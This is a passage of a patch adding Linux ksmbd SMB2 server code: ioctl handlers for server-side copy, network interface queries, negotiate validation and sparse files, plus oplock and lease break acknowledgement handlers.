++	    input_count < offsetof(struct copychunk_ioctl_req, Chunks) +
++	     chunk_count * sizeof(struct srv_copychunk)) {
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		return -EINVAL;
++	}
++
++	for (i = 0; i < chunk_count; i++) {
++		if (le32_to_cpu(chunks[i].Length) == 0 ||
++		    le32_to_cpu(chunks[i].Length) > ksmbd_server_side_copy_max_chunk_size())
++			break;
++		total_size_written += le32_to_cpu(chunks[i].Length);
++	}
++
++	if (i < chunk_count ||
++	    total_size_written > ksmbd_server_side_copy_max_total_size()) {
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		return -EINVAL;
++	}
++
++	src_fp = ksmbd_lookup_foreign_fd(work,
++					 le64_to_cpu(ci_req->ResumeKey[0]));
++	dst_fp = ksmbd_lookup_fd_slow(work, volatile_id, persistent_id);
++	ret = -EINVAL;
++	if (!src_fp ||
++	    src_fp->persistent_id != le64_to_cpu(ci_req->ResumeKey[1])) {
++		rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
++		goto out;
++	}
++
++	if (!dst_fp) {
++		rsp->hdr.Status = STATUS_FILE_CLOSED;
++		goto out;
++	}
++
++	/*
++	 * FILE_READ_DATA should only be included in
++	 * the FSCTL_COPYCHUNK case
++	 */
++	if (cnt_code == FSCTL_COPYCHUNK &&
++	    !(dst_fp->daccess & (FILE_READ_DATA_LE | FILE_GENERIC_READ_LE))) {
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		goto out;
++	}
++
++	ret = ksmbd_vfs_copy_file_ranges(work, src_fp, dst_fp,
++					 chunks, chunk_count,
++					 &chunk_count_written,
++					 &chunk_size_written,
++					 &total_size_written);
++	if (ret < 0) {
++		if (ret == -EACCES)
++			rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		if (ret == -EAGAIN)
++			rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
++		else if (ret == -EBADF)
++			rsp->hdr.Status = STATUS_INVALID_HANDLE;
++		else if (ret == -EFBIG || ret == -ENOSPC)
++			rsp->hdr.Status = STATUS_DISK_FULL;
++		else if (ret == -EINVAL)
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		else if (ret == -EISDIR)
++			rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
++		else if (ret == -E2BIG)
++			rsp->hdr.Status = STATUS_INVALID_VIEW_SIZE;
++		else
++			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++	}
++
++	ci_rsp->ChunksWritten = cpu_to_le32(chunk_count_written);
++	ci_rsp->ChunkBytesWritten = cpu_to_le32(chunk_size_written);
++	ci_rsp->TotalBytesWritten = cpu_to_le32(total_size_written);
++out:
++	ksmbd_fd_put(work, src_fp);
++	ksmbd_fd_put(work, dst_fp);
++	return ret;
++}
++
++static __be32 idev_ipv4_address(struct in_device *idev)
++{
++	__be32 addr = 0;
++
++	struct in_ifaddr *ifa;
++
++	rcu_read_lock();
++	in_dev_for_each_ifa_rcu(ifa, idev) {
++		if (ifa->ifa_flags & IFA_F_SECONDARY)
++			continue;
++
++		addr = ifa->ifa_address;
++		break;
++	}
++	rcu_read_unlock();
++	return addr;
++}
++
++static int fsctl_query_iface_info_ioctl(struct ksmbd_conn *conn,
++					struct smb2_ioctl_rsp *rsp,
++					unsigned int out_buf_len)
++{
++	struct network_interface_info_ioctl_rsp *nii_rsp = NULL;
++	int nbytes = 0;
++	struct net_device *netdev;
++	struct sockaddr_storage_rsp *sockaddr_storage;
++	unsigned int flags;
++	unsigned long long speed;
++
++	rtnl_lock();
++	for_each_netdev(&init_net, netdev) {
++		bool ipv4_set = false;
++
++		if (netdev->type == ARPHRD_LOOPBACK)
++			continue;
++
++		flags = dev_get_flags(netdev);
++		if (!(flags & IFF_RUNNING))
++			continue;
++ipv6_retry:
++		if (out_buf_len <
++		    nbytes + sizeof(struct network_interface_info_ioctl_rsp)) {
++			rtnl_unlock();
++			return -ENOSPC;
++		}
++
++		nii_rsp = (struct network_interface_info_ioctl_rsp *)
++				&rsp->Buffer[nbytes];
++		nii_rsp->IfIndex = cpu_to_le32(netdev->ifindex);
++
++		nii_rsp->Capability = 0;
++		if (netdev->real_num_tx_queues > 1)
++			nii_rsp->Capability |= cpu_to_le32(RSS_CAPABLE);
++		if (ksmbd_rdma_capable_netdev(netdev))
++			nii_rsp->Capability |= cpu_to_le32(RDMA_CAPABLE);
++
++		nii_rsp->Next = cpu_to_le32(152);
++		nii_rsp->Reserved = 0;
++
++		if (netdev->ethtool_ops->get_link_ksettings) {
++			struct ethtool_link_ksettings cmd;
++
++			netdev->ethtool_ops->get_link_ksettings(netdev, &cmd);
++			speed = cmd.base.speed;
++		} else {
++			ksmbd_debug(SMB, "%s %s\n", netdev->name,
++				    "speed is unknown, defaulting to 1Gb/sec");
++			speed = SPEED_1000;
++		}
++
++		speed *= 1000000;
++		nii_rsp->LinkSpeed = cpu_to_le64(speed);
++
++		sockaddr_storage = (struct sockaddr_storage_rsp *)
++					nii_rsp->SockAddr_Storage;
++		memset(sockaddr_storage, 0, 128);
++
++		if (!ipv4_set) {
++			struct in_device *idev;
++
++			sockaddr_storage->Family = cpu_to_le16(INTERNETWORK);
++			sockaddr_storage->addr4.Port = 0;
++
++			idev = __in_dev_get_rtnl(netdev);
++			if (!idev)
++				continue;
++			sockaddr_storage->addr4.IPv4address =
++						idev_ipv4_address(idev);
++			nbytes += sizeof(struct network_interface_info_ioctl_rsp);
++			ipv4_set = true;
++			goto ipv6_retry;
++		} else {
++			struct inet6_dev *idev6;
++			struct inet6_ifaddr *ifa;
++			__u8 *ipv6_addr = sockaddr_storage->addr6.IPv6address;
++
++			sockaddr_storage->Family = cpu_to_le16(INTERNETWORKV6);
++			sockaddr_storage->addr6.Port = 0;
++			sockaddr_storage->addr6.FlowInfo = 0;
++
++			idev6 = __in6_dev_get(netdev);
++			if (!idev6)
++				continue;
++
++			list_for_each_entry(ifa, &idev6->addr_list, if_list) {
++				if (ifa->flags & (IFA_F_TENTATIVE |
++							IFA_F_DEPRECATED))
++					continue;
++				memcpy(ipv6_addr, ifa->addr.s6_addr, 16);
++				break;
++			}
++			sockaddr_storage->addr6.ScopeId = 0;
++			nbytes += sizeof(struct network_interface_info_ioctl_rsp);
++		}
++	}
++	rtnl_unlock();
++
++	/* zero if this is last one */
++	if (nii_rsp)
++		nii_rsp->Next = 0;
++
++	rsp->PersistentFileId = SMB2_NO_FID;
++	rsp->VolatileFileId = SMB2_NO_FID;
++	return nbytes;
++}
++
++static int fsctl_validate_negotiate_info(struct ksmbd_conn *conn,
++					 struct validate_negotiate_info_req *neg_req,
++					 struct validate_negotiate_info_rsp *neg_rsp,
++					 unsigned int in_buf_len)
++{
++	int ret = 0;
++	int dialect;
++
++	if (in_buf_len < offsetof(struct validate_negotiate_info_req, Dialects) +
++			le16_to_cpu(neg_req->DialectCount) * sizeof(__le16))
++		return -EINVAL;
++
++	dialect = ksmbd_lookup_dialect_by_id(neg_req->Dialects,
++					     neg_req->DialectCount);
++	if (dialect == BAD_PROT_ID || dialect != conn->dialect) {
++		ret = -EINVAL;
++		goto err_out;
++	}
++
++	if (strncmp(neg_req->Guid, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE)) {
++		ret = -EINVAL;
++		goto err_out;
++	}
++
++	if (le16_to_cpu(neg_req->SecurityMode) != conn->cli_sec_mode) {
++		ret = -EINVAL;
++		goto err_out;
++	}
++
++	if (le32_to_cpu(neg_req->Capabilities) != conn->cli_cap) {
++		ret = -EINVAL;
++		goto err_out;
++	}
++
++	neg_rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
++	memset(neg_rsp->Guid, 0, SMB2_CLIENT_GUID_SIZE);
++	neg_rsp->SecurityMode = cpu_to_le16(conn->srv_sec_mode);
++	neg_rsp->Dialect = cpu_to_le16(conn->dialect);
++err_out:
++	return ret;
++}
++
++static int fsctl_query_allocated_ranges(struct ksmbd_work *work, u64 id,
++					struct file_allocated_range_buffer *qar_req,
++					struct file_allocated_range_buffer *qar_rsp,
++					unsigned int in_count, unsigned int *out_count)
++{
++	struct ksmbd_file *fp;
++	loff_t start, length;
++	int ret = 0;
++
++	*out_count = 0;
++	if (in_count == 0)
++		return -EINVAL;
++
++	start = le64_to_cpu(qar_req->file_offset);
++	length = le64_to_cpu(qar_req->length);
++
++	if (start < 0 || length < 0)
++		return -EINVAL;
++
++	fp = ksmbd_lookup_fd_fast(work, id);
++	if (!fp)
++		return -ENOENT;
++
++	ret = ksmbd_vfs_fqar_lseek(fp, start, length,
++				   qar_rsp, in_count, out_count);
++	if (ret && ret != -E2BIG)
++		*out_count = 0;
++
++	ksmbd_fd_put(work, fp);
++	return ret;
++}
++
++static int fsctl_pipe_transceive(struct ksmbd_work *work, u64 id,
++				 unsigned int out_buf_len,
++				 struct smb2_ioctl_req *req,
++				 struct smb2_ioctl_rsp *rsp)
++{
++	struct ksmbd_rpc_command *rpc_resp;
++	char *data_buf = (char *)&req->Buffer[0];
++	int nbytes = 0;
++
++	rpc_resp = ksmbd_rpc_ioctl(work->sess, id, data_buf,
++				   le32_to_cpu(req->InputCount));
++	if (rpc_resp) {
++		if (rpc_resp->flags == KSMBD_RPC_SOME_NOT_MAPPED) {
++			/*
++			 * set STATUS_SOME_NOT_MAPPED response
++			 * for unknown domain sid.
++			 */
++			rsp->hdr.Status = STATUS_SOME_NOT_MAPPED;
++		} else if (rpc_resp->flags == KSMBD_RPC_ENOTIMPLEMENTED) {
++			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++			goto out;
++		} else if (rpc_resp->flags != KSMBD_RPC_OK) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			goto out;
++		}
++
++		nbytes = rpc_resp->payload_sz;
++		if (rpc_resp->payload_sz > out_buf_len) {
++			rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
++			nbytes = out_buf_len;
++		}
++
++		if (!rpc_resp->payload_sz) {
++			rsp->hdr.Status =
++				STATUS_UNEXPECTED_IO_ERROR;
++			goto out;
++		}
++
++		memcpy((char *)rsp->Buffer, rpc_resp->payload, nbytes);
++	}
++out:
++	kvfree(rpc_resp);
++	return nbytes;
++}
++
++static inline int fsctl_set_sparse(struct ksmbd_work *work, u64 id,
++				   struct file_sparse *sparse)
++{
++	struct ksmbd_file *fp;
++	struct user_namespace *user_ns;
++	int ret = 0;
++	__le32 old_fattr;
++
++	fp = ksmbd_lookup_fd_fast(work, id);
++	if (!fp)
++		return -ENOENT;
++	user_ns = file_mnt_user_ns(fp->filp);
++
++	old_fattr = fp->f_ci->m_fattr;
++	if (sparse->SetSparse)
++		fp->f_ci->m_fattr |= FILE_ATTRIBUTE_SPARSE_FILE_LE;
++	else
++		fp->f_ci->m_fattr &= ~FILE_ATTRIBUTE_SPARSE_FILE_LE;
++
++	if (fp->f_ci->m_fattr != old_fattr &&
++	    test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_STORE_DOS_ATTRS)) {
++		struct xattr_dos_attrib da;
++
++		ret = ksmbd_vfs_get_dos_attrib_xattr(user_ns,
++						     fp->filp->f_path.dentry, &da);
++		if (ret <= 0)
++			goto out;
++
++		da.attr = le32_to_cpu(fp->f_ci->m_fattr);
++		ret = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
++						     fp->filp->f_path.dentry, &da);
++		if (ret)
++			fp->f_ci->m_fattr = old_fattr;
++	}
++
++out:
++	ksmbd_fd_put(work, fp);
++	return ret;
++}
++
++static int fsctl_request_resume_key(struct ksmbd_work *work,
++				    struct smb2_ioctl_req *req,
++				    struct resume_key_ioctl_rsp *key_rsp)
++{
++	struct ksmbd_file *fp;
++
++	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	if (!fp)
++		return -ENOENT;
++
++	memset(key_rsp, 0, sizeof(*key_rsp));
++	key_rsp->ResumeKey[0] = req->VolatileFileId;
++	key_rsp->ResumeKey[1] = req->PersistentFileId;
++	ksmbd_fd_put(work, fp);
++
++	return 0;
++}
++
++/**
++ * smb2_ioctl() - handler for smb2 ioctl command
++ * @work:	smb work containing ioctl command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_ioctl(struct ksmbd_work *work)
++{
++	struct smb2_ioctl_req *req;
++	struct smb2_ioctl_rsp *rsp;
++	unsigned int cnt_code, nbytes = 0, out_buf_len, in_buf_len;
++	u64 id = KSMBD_NO_FID;
++	struct ksmbd_conn *conn = work->conn;
++	int ret = 0;
++
++	if (work->next_smb2_rcv_hdr_off) {
++		req = ksmbd_req_buf_next(work);
++		rsp = ksmbd_resp_buf_next(work);
++		if (!has_file_id(req->VolatileFileId)) {
++			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
++				    work->compound_fid);
++			id = work->compound_fid;
++		}
++	} else {
++		req = smb2_get_msg(work->request_buf);
++		rsp = smb2_get_msg(work->response_buf);
++	}
++
++	if (!has_file_id(id))
++		id = req->VolatileFileId;
++
++	if (req->Flags != cpu_to_le32(SMB2_0_IOCTL_IS_FSCTL)) {
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++		goto out;
++	}
++
++	cnt_code = le32_to_cpu(req->CtlCode);
++	ret = smb2_calc_max_out_buf_len(work, 48,
++					le32_to_cpu(req->MaxOutputResponse));
++	if (ret < 0) {
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		goto out;
++	}
++	out_buf_len = (unsigned int)ret;
++	in_buf_len = le32_to_cpu(req->InputCount);
++
++	switch (cnt_code) {
++	case FSCTL_DFS_GET_REFERRALS:
++	case FSCTL_DFS_GET_REFERRALS_EX:
++		/* Not support DFS yet */
++		rsp->hdr.Status = STATUS_FS_DRIVER_REQUIRED;
++		goto out;
++	case FSCTL_CREATE_OR_GET_OBJECT_ID:
++	{
++		struct file_object_buf_type1_ioctl_rsp *obj_buf;
++
++		nbytes = sizeof(struct file_object_buf_type1_ioctl_rsp);
++		obj_buf = (struct file_object_buf_type1_ioctl_rsp *)
++			&rsp->Buffer[0];
++
++		/*
++		 * TODO: This is dummy implementation to pass smbtorture
++		 * Need to check correct response later
++		 */
++		memset(obj_buf->ObjectId, 0x0, 16);
++		memset(obj_buf->BirthVolumeId, 0x0, 16);
++		memset(obj_buf->BirthObjectId, 0x0, 16);
++		memset(obj_buf->DomainId, 0x0, 16);
++
++		break;
++	}
++	case FSCTL_PIPE_TRANSCEIVE:
++		out_buf_len = min_t(u32, KSMBD_IPC_MAX_PAYLOAD, out_buf_len);
++		nbytes = fsctl_pipe_transceive(work, id, out_buf_len, req, rsp);
++		break;
++	case FSCTL_VALIDATE_NEGOTIATE_INFO:
++		if (conn->dialect < SMB30_PROT_ID) {
++			ret = -EOPNOTSUPP;
++			goto out;
++		}
++
++		if (in_buf_len < offsetof(struct validate_negotiate_info_req,
++					  Dialects)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		if (out_buf_len < sizeof(struct validate_negotiate_info_rsp)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		ret = fsctl_validate_negotiate_info(conn,
++			(struct validate_negotiate_info_req *)&req->Buffer[0],
++			(struct validate_negotiate_info_rsp *)&rsp->Buffer[0],
++			in_buf_len);
++		if (ret < 0)
++			goto out;
++
++		nbytes = sizeof(struct validate_negotiate_info_rsp);
++		rsp->PersistentFileId = SMB2_NO_FID;
++		rsp->VolatileFileId = SMB2_NO_FID;
++		break;
++	case FSCTL_QUERY_NETWORK_INTERFACE_INFO:
++		ret = fsctl_query_iface_info_ioctl(conn, rsp, out_buf_len);
++		if (ret < 0)
++			goto out;
++		nbytes = ret;
++		break;
++	case FSCTL_REQUEST_RESUME_KEY:
++		if (out_buf_len < sizeof(struct resume_key_ioctl_rsp)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		ret = fsctl_request_resume_key(work, req,
++					       (struct resume_key_ioctl_rsp *)&rsp->Buffer[0]);
++		if (ret < 0)
++			goto out;
++		rsp->PersistentFileId = req->PersistentFileId;
++		rsp->VolatileFileId = req->VolatileFileId;
++		nbytes = sizeof(struct resume_key_ioctl_rsp);
++		break;
++	case FSCTL_COPYCHUNK:
++	case FSCTL_COPYCHUNK_WRITE:
++		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++			ksmbd_debug(SMB,
++				    "User does not have write permission\n");
++			ret = -EACCES;
++			goto out;
++		}
++
++		if (in_buf_len < sizeof(struct copychunk_ioctl_req)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		if (out_buf_len < sizeof(struct copychunk_ioctl_rsp)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		nbytes = sizeof(struct copychunk_ioctl_rsp);
++		rsp->VolatileFileId = req->VolatileFileId;
++		rsp->PersistentFileId = req->PersistentFileId;
++		fsctl_copychunk(work,
++				(struct copychunk_ioctl_req *)&req->Buffer[0],
++				le32_to_cpu(req->CtlCode),
++				le32_to_cpu(req->InputCount),
++				req->VolatileFileId,
++				req->PersistentFileId,
++				rsp);
++		break;
++	case FSCTL_SET_SPARSE:
++		if (in_buf_len < sizeof(struct file_sparse)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		ret = fsctl_set_sparse(work, id,
++				       (struct file_sparse *)&req->Buffer[0]);
++		if (ret < 0)
++			goto out;
++		break;
++	case FSCTL_SET_ZERO_DATA:
++	{
++		struct file_zero_data_information *zero_data;
++		struct ksmbd_file *fp;
++		loff_t off, len, bfz;
++
++		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++			ksmbd_debug(SMB,
++				    "User does not have write permission\n");
++			ret = -EACCES;
++			goto out;
++		}
++
++		if (in_buf_len < sizeof(struct file_zero_data_information)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		zero_data =
++			(struct file_zero_data_information *)&req->Buffer[0];
++
++		off = le64_to_cpu(zero_data->FileOffset);
++		bfz = le64_to_cpu(zero_data->BeyondFinalZero);
++		if (off < 0 || bfz < 0 || off > bfz) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		len = bfz - off;
++		if (len) {
++			fp = ksmbd_lookup_fd_fast(work, id);
++			if (!fp) {
++				ret = -ENOENT;
++				goto out;
++			}
++
++			ret = ksmbd_vfs_zero_data(work, fp, off, len);
++			ksmbd_fd_put(work, fp);
++			if (ret < 0)
++				goto out;
++		}
++		break;
++	}
++	case FSCTL_QUERY_ALLOCATED_RANGES:
++		if (in_buf_len < sizeof(struct file_allocated_range_buffer)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		ret = fsctl_query_allocated_ranges(work, id,
++			(struct file_allocated_range_buffer *)&req->Buffer[0],
++			(struct file_allocated_range_buffer *)&rsp->Buffer[0],
++			out_buf_len /
++			sizeof(struct file_allocated_range_buffer), &nbytes);
++		if (ret == -E2BIG) {
++			rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
++		} else if (ret < 0) {
++			nbytes = 0;
++			goto out;
++		}
++
++		nbytes *= sizeof(struct file_allocated_range_buffer);
++		break;
++	case FSCTL_GET_REPARSE_POINT:
++	{
++		struct reparse_data_buffer *reparse_ptr;
++		struct ksmbd_file *fp;
++
++		reparse_ptr = (struct reparse_data_buffer *)&rsp->Buffer[0];
++		fp = ksmbd_lookup_fd_fast(work, id);
++		if (!fp) {
++			pr_err("not found fp!!\n");
++			ret = -ENOENT;
++			goto out;
++		}
++
++		reparse_ptr->ReparseTag =
++			smb2_get_reparse_tag_special_file(file_inode(fp->filp)->i_mode);
++		reparse_ptr->ReparseDataLength = 0;
++		ksmbd_fd_put(work, fp);
++		nbytes = sizeof(struct reparse_data_buffer);
++		break;
++	}
++	case FSCTL_DUPLICATE_EXTENTS_TO_FILE:
++	{
++		struct ksmbd_file *fp_in, *fp_out = NULL;
++		struct duplicate_extents_to_file *dup_ext;
++		loff_t src_off, dst_off, length, cloned;
++
++		if (in_buf_len < sizeof(struct duplicate_extents_to_file)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		dup_ext = (struct duplicate_extents_to_file *)&req->Buffer[0];
++
++		fp_in = ksmbd_lookup_fd_slow(work, dup_ext->VolatileFileHandle,
++					     dup_ext->PersistentFileHandle);
++		if (!fp_in) {
++			pr_err("not found file handle in duplicate extent to file\n");
++			ret = -ENOENT;
++			goto out;
++		}
++
++		fp_out = ksmbd_lookup_fd_fast(work, id);
++		if (!fp_out) {
++			pr_err("not found fp\n");
++			ret = -ENOENT;
++			goto dup_ext_out;
++		}
++
++		src_off = le64_to_cpu(dup_ext->SourceFileOffset);
++		dst_off = le64_to_cpu(dup_ext->TargetFileOffset);
++		length = le64_to_cpu(dup_ext->ByteCount);
++		/*
++		 * XXX: It is not clear if FSCTL_DUPLICATE_EXTENTS_TO_FILE
++		 * should fall back to vfs_copy_file_range().  This could be
++		 * beneficial when re-exporting nfs/smb mount, but note that
++		 * this can result in partial copy that returns an error status.
++		 * If/when FSCTL_DUPLICATE_EXTENTS_TO_FILE_EX is implemented,
++		 * fall back to vfs_copy_file_range(), should be avoided when
++		 * the flag DUPLICATE_EXTENTS_DATA_EX_SOURCE_ATOMIC is set.
++		 */
++		cloned = vfs_clone_file_range(fp_in->filp, src_off,
++					      fp_out->filp, dst_off, length, 0);
++		if (cloned == -EXDEV || cloned == -EOPNOTSUPP) {
++			ret = -EOPNOTSUPP;
++			goto dup_ext_out;
++		} else if (cloned != length) {
++			cloned = vfs_copy_file_range(fp_in->filp, src_off,
++						     fp_out->filp, dst_off,
++						     length, 0);
++			if (cloned != length) {
++				if (cloned < 0)
++					ret = cloned;
++				else
++					ret = -EINVAL;
++			}
++		}
++
++dup_ext_out:
++		ksmbd_fd_put(work, fp_in);
++		ksmbd_fd_put(work, fp_out);
++		if (ret < 0)
++			goto out;
++		break;
++	}
++	default:
++		ksmbd_debug(SMB, "not implemented yet ioctl command 0x%x\n",
++			    cnt_code);
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
++
++	rsp->CtlCode = cpu_to_le32(cnt_code);
++	rsp->InputCount = cpu_to_le32(0);
++	rsp->InputOffset = cpu_to_le32(112);
++	rsp->OutputOffset = cpu_to_le32(112);
++	rsp->OutputCount = cpu_to_le32(nbytes);
++	rsp->StructureSize = cpu_to_le16(49);
++	rsp->Reserved = cpu_to_le16(0);
++	rsp->Flags = cpu_to_le32(0);
++	rsp->Reserved2 = cpu_to_le32(0);
++	inc_rfc1001_len(work->response_buf, 48 + nbytes);
++
++	return 0;
++
++out:
++	if (ret == -EACCES)
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++	else if (ret == -ENOENT)
++		rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
++	else if (ret == -EOPNOTSUPP)
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++	else if (ret == -ENOSPC)
++		rsp->hdr.Status = STATUS_BUFFER_TOO_SMALL;
++	else if (ret < 0 || rsp->hdr.Status == 0)
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++	smb2_set_err_rsp(work);
++	return 0;
++}
++
++/**
++ * smb20_oplock_break_ack() - handler for smb2.0 oplock break command
++ * @work:	smb work containing oplock break command buffer
++ *
++ * Return:	0
++ */
++static void smb20_oplock_break_ack(struct ksmbd_work *work)
++{
++	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
++	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_file *fp;
++	struct oplock_info *opinfo = NULL;
++	__le32 err = 0;
++	int ret = 0;
++	u64 volatile_id, persistent_id;
++	char req_oplevel = 0, rsp_oplevel = 0;
++	unsigned int oplock_change_type;
++
++	volatile_id = req->VolatileFid;
++	persistent_id = req->PersistentFid;
++	req_oplevel = req->OplockLevel;
++	ksmbd_debug(OPLOCK, "v_id %llu, p_id %llu request oplock level %d\n",
++		    volatile_id, persistent_id, req_oplevel);
++
++	fp = ksmbd_lookup_fd_slow(work, volatile_id, persistent_id);
++	if (!fp) {
++		rsp->hdr.Status = STATUS_FILE_CLOSED;
++		smb2_set_err_rsp(work);
++		return;
++	}
++
++	opinfo = opinfo_get(fp);
++	if (!opinfo) {
++		pr_err("unexpected null oplock_info\n");
++		rsp->hdr.Status = STATUS_INVALID_OPLOCK_PROTOCOL;
++		smb2_set_err_rsp(work);
++		ksmbd_fd_put(work, fp);
++		return;
++	}
++
++	if (opinfo->level == SMB2_OPLOCK_LEVEL_NONE) {
++		rsp->hdr.Status = STATUS_INVALID_OPLOCK_PROTOCOL;
++		goto err_out;
++	}
++
++	if (opinfo->op_state == OPLOCK_STATE_NONE) {
++		ksmbd_debug(SMB, "unexpected oplock state 0x%x\n", opinfo->op_state);
++		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
++		goto err_out;
++	}
++
++	if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
++	     opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
++	    (req_oplevel != SMB2_OPLOCK_LEVEL_II &&
++	     req_oplevel != SMB2_OPLOCK_LEVEL_NONE)) {
++		err = STATUS_INVALID_OPLOCK_PROTOCOL;
++		oplock_change_type = OPLOCK_WRITE_TO_NONE;
++	} else if (opinfo->level == SMB2_OPLOCK_LEVEL_II &&
++		   req_oplevel != SMB2_OPLOCK_LEVEL_NONE) {
++		err = STATUS_INVALID_OPLOCK_PROTOCOL;
++		oplock_change_type = OPLOCK_READ_TO_NONE;
++	} else if (req_oplevel == SMB2_OPLOCK_LEVEL_II ||
++		   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
++		err = STATUS_INVALID_DEVICE_STATE;
++		if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
++		     opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
++		    req_oplevel == SMB2_OPLOCK_LEVEL_II) {
++			oplock_change_type = OPLOCK_WRITE_TO_READ;
++		} else if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
++			    opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
++			   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
++			oplock_change_type = OPLOCK_WRITE_TO_NONE;
++		} else if (opinfo->level == SMB2_OPLOCK_LEVEL_II &&
++			   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
++			oplock_change_type = OPLOCK_READ_TO_NONE;
++		} else {
++			oplock_change_type = 0;
++		}
++	} else {
++		oplock_change_type = 0;
++	}
++
++	switch (oplock_change_type) {
++	case OPLOCK_WRITE_TO_READ:
++		ret = opinfo_write_to_read(opinfo);
++		rsp_oplevel = SMB2_OPLOCK_LEVEL_II;
++		break;
++	case OPLOCK_WRITE_TO_NONE:
++		ret = opinfo_write_to_none(opinfo);
++		rsp_oplevel = SMB2_OPLOCK_LEVEL_NONE;
++		break;
++	case OPLOCK_READ_TO_NONE:
++		ret = opinfo_read_to_none(opinfo);
++		rsp_oplevel = SMB2_OPLOCK_LEVEL_NONE;
++		break;
++	default:
++		pr_err("unknown oplock change 0x%x -> 0x%x\n",
++		       opinfo->level, rsp_oplevel);
++	}
++
++	if (ret < 0) {
++		rsp->hdr.Status = err;
++		goto err_out;
++	}
++
++	opinfo_put(opinfo);
++	ksmbd_fd_put(work, fp);
++	opinfo->op_state = OPLOCK_STATE_NONE;
++	wake_up_interruptible_all(&opinfo->oplock_q);
++
++	rsp->StructureSize = cpu_to_le16(24);
++	rsp->OplockLevel = rsp_oplevel;
++	rsp->Reserved = 0;
++	rsp->Reserved2 = 0;
++	rsp->VolatileFid = volatile_id;
++	rsp->PersistentFid = persistent_id;
++	inc_rfc1001_len(work->response_buf, 24);
++	return;
++
++err_out:
++	opinfo->op_state = OPLOCK_STATE_NONE;
++	wake_up_interruptible_all(&opinfo->oplock_q);
++
++	opinfo_put(opinfo);
++	ksmbd_fd_put(work, fp);
++	smb2_set_err_rsp(work);
++}
++
++static int check_lease_state(struct lease *lease, __le32 req_state)
++{
++	if ((lease->new_state ==
++	     (SMB2_LEASE_READ_CACHING_LE | SMB2_LEASE_HANDLE_CACHING_LE)) &&
++	    !(req_state & SMB2_LEASE_WRITE_CACHING_LE)) {
++		lease->new_state = req_state;
++		return 0;
++	}
++
++	if (lease->new_state == req_state)
++		return 0;
++
++	return 1;
++}
++
++/**
++ * smb21_lease_break_ack() - handler for smb2.1 lease break command
++ * @work:	smb work containing lease break command buffer
++ *
++ * Return:	0
++ */
++static void smb21_lease_break_ack(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_lease_ack *req = smb2_get_msg(work->request_buf);
++	struct smb2_lease_ack *rsp = smb2_get_msg(work->response_buf);
++	struct oplock_info *opinfo;
++	__le32 err = 0;
++	int ret = 0;
++	unsigned int lease_change_type;
++	__le32 lease_state;
++	struct lease *lease;
++
++	ksmbd_debug(OPLOCK, "smb21 lease break, lease state(0x%x)\n",
++		    le32_to_cpu(req->LeaseState));
++	opinfo = lookup_lease_in_table(conn, req->LeaseKey);
++	if (!opinfo) {
++		ksmbd_debug(OPLOCK, "file not opened\n");
++		smb2_set_err_rsp(work);
++		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
++		return;
++	}
++	lease = opinfo->o_lease;
++
++	if (opinfo->op_state == OPLOCK_STATE_NONE) {
++		pr_err("unexpected lease break state 0x%x\n",
++		       opinfo->op_state);
++		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
++		goto err_out;
++	}
++
++	if (check_lease_state(lease, req->LeaseState)) {
++		rsp->hdr.Status = STATUS_REQUEST_NOT_ACCEPTED;
++		ksmbd_debug(OPLOCK,
++			    "req lease state: 0x%x, expected state: 0x%x\n",
